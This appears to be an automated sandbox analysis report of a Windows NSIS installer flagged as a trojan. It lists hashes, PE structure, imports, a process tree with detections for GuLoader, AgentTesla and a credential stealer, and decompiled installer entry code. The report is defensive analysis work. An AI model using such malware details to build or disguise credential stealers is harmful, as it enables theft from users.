SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.401310327702789
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File size:	609224
MD5:	67a4759a7b2fcb1a7e5b368fc150b974
SHA1:	592934bd8f6606f80a890008008a621f7abda152
SHA256:	19762fa9a397bf711cb2aa16f78915d4beaf49e9b67ffccfa3e3b01e35c7289a
SHA512:	e7540621211cc64faee06b3cf17c69fe45fdb9a39e69e8404c284d44a518a624a812eca1e9f49dd0aead9d717f9bc52cc6c7f4c32535f42baa472884b84ba133
SSDEEP:	12288:5bspFozv47H44s5Q4IDT9jXbgO1xzSs9IKTQWfsmuYUE:5bsLnY4s5k0k9IKTQWkmuZE
TLSH:	9DD4F155BAC8ECABC01691B81475AF626A93FE2518748E03173E7E2FF732153243B91D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	38e6d3b1b3a2cc71

Static PE Info

General

Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FD2384DEDDAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FD2384DEDAAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6b000	0x27620	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	False	0.666126179245	data	6.45839821493	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	False	0.439275568182	data	5.02410928126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	False	0.521484375	data	4.15458210409	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x36000	0x35000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6b000	0x27620	0x27800	False	0.363744808149	data	4.74589509923	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x6b2f8	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x7bb20	0x94a8	data	English	United States
RT_ICON	0x84fc8	0x5488	data	English	United States
RT_ICON	0x8a450	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 6356992, next used block 0	English	United States
RT_ICON	0x8e678	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x90c20	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	United States
RT_DIALOG	0x91cc8	0x100	data	English	United States
RT_DIALOG	0x91dc8	0x11c	data	English	United States
RT_DIALOG	0x91ee8	0xc4	data	English	United States
RT_DIALOG	0x91fb0	0x60	data	English	United States
RT_GROUP_ICON	0x92010	0x5a	data	English	United States
RT_VERSION	0x92070	0x270	data	English	United States
RT_MANIFEST	0x922e0	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description	Data
LegalCopyright	Insweepi
FileVersion	27.29.17
CompanyName	CHRYSALIDAH
LegalTrademarks	Vrdi24
Comments	reconnoiterlbni
ProductName	petiolispill
FileDescription	Pratalkoholis
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exePID: 3120, Parent PID: 7904

General

Target ID:	1
Start time:	16:46:10
Start date:	26/05/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe"
Imagebase:	0x400000
File size:	609224 bytes
MD5 hash:	67A4759A7B2FCB1A7E5B368FC150B974
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mpam-e428c3f6.exePID: 1304, Parent PID: 4880

General

Target ID:	3
Start time:	16:46:14
Start date:	26/05/2022
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-e428c3f6.exe" /q WD
Imagebase:	0x7ff74e710000
File size:	112821704 bytes
MD5 hash:	89D4A3575EC6AEEFB442C18A41A18DDA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7932, Parent PID: 932

General

Target ID:	4
Start time:	16:46:20
Start date:	26/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff655680000
File size:	57360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 3872, Parent PID: 3120

General

Target ID:	5
Start time:	16:46:26
Start date:	26/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe"
Imagebase:	0xb50000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.18323333088.0000000000F30000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4968, Parent PID: 3872

General

Target ID:	6
Start time:	16:46:26
Start date:	26/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a8620000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: MpSigStub.exePID: 1656, Parent PID: 1304

General

Target ID:	7
Start time:	16:46:32
Start date:	26/05/2022
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe /stub 1.1.18500.10 /payload 1.367.502.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-e428c3f6.exe /q WD
Imagebase:	0x7ff6f4470000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: wevtutil.exePID: 5392, Parent PID: 3180

General

Target ID:	8
Start time:	16:46:35
Start date:	26/05/2022
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3FCB5F68-CD33-FF2F-34AE-798C9A7026D4.man
Imagebase:	0x7ff74a790000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 9144, Parent PID: 5392

General

Target ID:	9
Start time:	16:46:35
Start date:	26/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a8620000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: wevtutil.exePID: 7292, Parent PID: 3180

General

Target ID:	10
Start time:	16:46:37
Start date:	26/05/2022
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3FCB5F68-CD33-FF2F-34AE-798C9A7026D4.man "/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll" "/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll"
Imagebase:	0x7ff74a790000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5416, Parent PID: 7292

General

Target ID:	11
Start time:	16:46:37
Start date:	26/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a8620000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: mpengine.exePID: 7860, Parent PID: 3180

General

Target ID:	12
Start time:	16:46:41
Start date:	26/05/2022
Path:	C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpengine.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\Microsoft\Windows Defender\Scans\\MpPayloadData\mpengine.exe
Imagebase:	0x7ff71c580000
File size:	91528 bytes
MD5 hash:	C84EBFCFAFEB07D863C3ED18F6FBD40F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8572, Parent PID: 7860

General

Target ID:	13
Start time:	16:46:41
Start date:	26/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a8620000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: MpKslDrv.sysPID: 4, Parent PID: -1

General

Target ID:	14
Start time:	16:46:42
Start date:	26/05/2022
Path:	C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{EBBB10C2-099A-4A41-A364-F566D3127AB4}\MpKslDrv.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	137464 bytes
MD5 hash:	97D3A85D7EF930E7035DAAC1622AD407
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: mpam-60574f34.exePID: 2156, Parent PID: 4880

General

Target ID:	16
Start time:	16:46:44
Start date:	26/05/2022
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-60574f34.exe
Imagebase:	0x7ff700eb0000
File size:	8690936 bytes
MD5 hash:	50BCDEEB6A1DFFF15B62BEDAC2DDACA8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: MpSigStub.exePID: 9000, Parent PID: 2156

General

Target ID:	19
Start time:	16:47:08
Start date:	26/05/2022
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2203.5 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-60574f34.exe
Imagebase:	0x7ff7d39b0000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6648, Parent PID: 932

General

Target ID:	20
Start time:	16:47:12
Start date:	26/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff655680000
File size:	57360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WdNisDrv.sysPID: 4, Parent PID: -1

General

Target ID:	21
Start time:	16:47:12
Start date:	26/05/2022
Path:	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\Drivers\WdNisDrv.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	86264 bytes
MD5 hash:	B757AF9B44B0C0C75103210D9C7026FF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: NisSrv.exePID: 4264, Parent PID: 932

General

Target ID:	22
Start time:	16:47:12
Start date:	26/05/2022
Path:	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\NisSrv.exe
Imagebase:	0x7ff7ae2d0000
File size:	2772856 bytes
MD5 hash:	B7F144CC18AE552E1C3D42051A934902
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4912, Parent PID: 932

General

Target ID:	23
Start time:	16:50:57
Start date:	26/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Imagebase:	0x7ff655680000
File size:	57360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2928, Parent PID: 932

General

Target ID:	29
Start time:	16:52:31
Start date:	26/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff655680000
File size:	57360 bytes
MD5 hash:	F586835082F632DC8D9404D83BC16316
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exePID: 3120, Parent PID: 7904COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	8.4%
Signature Coverage:	25.9%
Total number of Nodes:	881
Total number of Limit Nodes:	46

Executed Functions

Function 0040352D Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
